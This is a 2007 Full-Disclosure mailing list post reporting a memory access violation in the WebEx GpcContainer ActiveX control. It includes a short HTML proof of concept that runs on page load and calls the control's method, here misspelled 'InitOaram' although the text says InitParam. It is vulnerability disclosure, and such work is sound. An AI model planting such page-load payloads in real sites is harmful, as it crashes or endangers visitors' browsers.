[Full-disclosure] WebEx GPCContainer Memory Access Violation
Elazar Broad
elazarb at earthlink.net
Tue Nov 13 16:50:33 GMT 2007
There is a memory access violation in the InitParam() and SetParam() functions. PoC as follows:
---------------------
<!--
Written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var obj = new ActiveXObject("GpcContainer.GpcContainer.1");
obj.InitOaram("A");
}
</script>
</head>
<body onLoad="JavaScript: return Check();">
</body>
</html>
---------------------
Elazar
Full-Disclosure is hosted and sponsored by Secunia.